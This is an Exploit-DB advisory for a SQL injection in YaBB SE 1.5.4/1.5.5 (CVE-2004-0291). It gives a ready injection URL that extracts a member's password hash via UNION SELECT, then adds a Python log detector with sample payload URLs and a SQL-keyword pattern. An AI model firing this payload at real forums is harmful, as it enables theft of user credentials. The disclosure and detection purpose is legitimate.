- 18 Dec 2022
- EDB-ID: 23710
- EDB verification: Passed
- Author: BACKSPACE
- Vulnerability type: WEBAPPS
- Platform: PHP
- CVE: CVE-2004-0291
- Publication date: 2004-02-16
Code:
source: https://www.securityfocus.com/bid/9674/info
It has been reported that YaBB SE may be prone to a SQL injection vulnerability that may allow a remote user to inject arbitrary SQL queries into the database used by the software.
YaBB SE versions 1.5.4 and 1.5.5 have been reported to be affected by this issue; however, other versions could be affected as well.
http://www.example.com/yabbse//index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f2;action=post;threadid=1;title=Post+reply;quote=-12)+UNION+SELECT+passwd,null,null,null,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*
- Source: www.exploit-db.com
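A defensive check for the request pattern above, as an added example that is not part of the original advisory or of YaBB SE's code: it parses the `;`-separated query string and flags id parameters that are not plain integers. That `board`, `threadid` and `quote` are numeric ids is an assumption drawn from the URL shown, and the sample URLs are constructed.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Assumption: these parameters carry numeric ids in normal YaBB SE traffic.
NUMERIC_PARAMS = {"board", "threadid", "quote"}
# Heuristic markers seen in the advisory's request: UNION ... SELECT and "/*".
SQL_TOKENS = re.compile(r"\bunion\b.*\bselect\b|/\*", re.I)


def parse_params(url):
    """Split a query string that uses ';' (as in the URL above) or '&'."""
    params = {}
    for pair in re.split(r"[;&]", urlsplit(url).query):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote_plus(key)] = unquote_plus(value)
    return params


def findings(url):
    """Return a list of (parameter, reason) tuples for one request URL."""
    out = []
    for name, value in parse_params(url).items():
        # An id that is anything but digits never belongs in these fields.
        if name in NUMERIC_PARAMS and not re.fullmatch(r"\d+", value):
            out.append((name, "non-numeric id"))
        if SQL_TOKENS.search(value):
            out.append((name, "SQL keywords or comment marker"))
    return out


# Constructed sample requests (not real log data).
SAMPLES = [
    "http://www.example.com/yabbse/index.php?board=1;action=post;"
    "threadid=1;title=Post+reply;quote=12",
    "http://www.example.com/yabbse/index.php?board=1;action=post;"
    "threadid=1;quote=-12)+UNION+SELECT+passwd,null+FROM+yabbse_members/*",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(findings(url) or "clean", "<-", url)
```

Log matching of this kind only detects the request; the fix is the same integer check enforced server-side before the value reaches the SQL query.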